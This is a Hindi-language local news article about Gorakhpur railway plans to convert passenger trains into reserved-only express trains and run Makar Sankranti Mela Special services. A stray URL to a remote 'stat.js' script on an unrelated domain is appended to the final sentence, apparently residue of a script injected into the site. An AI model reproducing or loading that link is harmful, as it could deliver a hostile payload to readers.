गोरखपुर,( कुलसूम फात्मा ) गोरखपुर – पाटलिपुत्र जनवरी से एक्सप्रेस के रूप में ट्रेन चलाई जाएगी, इसकी घोषणा की जा चुकी है। इसके साथ ही रेलवे प्रशासन ने दो और ट्रेनों को एक्सप्रेस के रूप में चलाने की योजना तैयार कर ली है।

 

 

इन ट्रेनों की खास बात यह होगी की ये ट्रेनें स्टेशनों पर कम रुकेंगीे और इनकी रफ्तार अधिक होगी। यात्री कम वक्त में अपने स्थान पर जल्दी पहुंच जाएंगे। कोरोना महामारी में जनरल टिकट की बिक्री समाप्त होने के पश्चात रेलवे बोर्ड ने सवारी गाड़ियों को एक्सप्रेस बनाने की जब बात की तो इससे यात्रियों की जेब खाली होने के चांसेस अधिक दिखने लगे ।

 

 

 

अब हाल्ट स्टेशन के यात्रियो की परेशानी अधिक बढ़ जाएगी क्योंकि लोगों को दूरी तय करने के लिए 15 से 30 रू तक का अधिक शुल्क देना पड़ जाएगा। एजेंट के यहां से यदि टिकट यात्री बुक करवाते हैं तो उनको चार्ज 50 से 60रू देना पड़ेंगे।  रेलवे प्रशासन ने फिलहाल 55031,55050 नकहा जंगल, राजधानी जंक्शन तथा 55119, 55150 गोरखपुर वाराणसी पैसेंजर ट्रेन को भी एक्सप्रेस के रूप में बदलने का निर्णय लिया है और यह प्रक्रिया प्रारंभ भी कर दी गई है। रेलवे बोर्ड के दिशा निर्देश पर पूर्वोत्तर रेलवे प्रशासन ने इन 8 जोड़ी ट्रेन को एक्सप्रेस के रूप में बनाने का प्रपोजल पूर्ण रूप से तैयार भी कर दिया है। बोर्ड ने फर्स्ट स्टेज में तीन ट्रेनों को एक्सप्रेस बनाने की सिफारिश की है।

 

 

शुक्रवार के दिन मेला स्पेशल के रूप में एक्सप्रेस ट्रेनों को चलाने की मुहर लगा दी गई है। बता दें की मकर संक्रांति पर्व पर बाबा गोरखनाथ की खिचड़ी चढ़ाने वाले श्रद्धालुओं को अब सुकून मिलेगा क्योंकि यह सवारी गाड़ियों को जो मना करा गया था उसके पश्चात पूर्वोत्तर रेलवे प्रशासन ने मेला स्पेशल के रूप में एक्सप्रेस ट्रेन को चलाने की हरी झंडी दिखा दी है।

 

एक्सप्रेस ट्रेन जनवरी की 13 तारीख से 15 तारीख़ के मध्य गोरखपुर से नौतनवा तथा गोरखपुर से बढ़नी मार्ग पर तीन फेरों में चलाई जाएगी और यह ट्रेनें रास्ते में पड़ने वाली सभी स्टेशनों पर रुकेगी भी, इसके साथ ही इन ट्रेनों में सिर्फ आरक्षित कोच ही लगाई जाएंगी और कन्फर्म आरक्षित टिकट पर यात्रा की अनुमति भी दी जाएगी। कोविड महामारी के संबंध निर्देश दिए गए हैं की प्रोटोकॉल का पूर्ण रुप से पालन करना यात्रियों को अनिवार्य होगा।

 

 

बता दे के पूर्वोत्तर रेलवे प्रशासन के प्रपोजल पर रेलवे बोर्ड ने जनरल टिकट की बिक्री की प्रक्रिया को समाप्त होने की दशा में सिर्फ आरक्षित एक्सप्रेस ट्रेन को ही चलाने की परमिशन दिया है। बोर्ड ने अनारक्षित ट्रेनों को चलाने पर पूर्ण रूप से रोक लगा दी है। स्पेशल के रूप में जो ट्रेन एक्सप्रेस ट्रेनों के रूप में चलाई जा रही हैं, उनको ही केवल परमिशन मिलने के पश्चात उनका ही संचालन तथा वाणिज्य और सुरक्षा विभाग अलर्ट हो गया है। टिकटों की बुकिंग यात्रियों की सुरक्षा तथा उन्हें दी जाने वाली सुविधाओं की तैयारी वर्तमान समय में प्रारंभ हो गई है।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.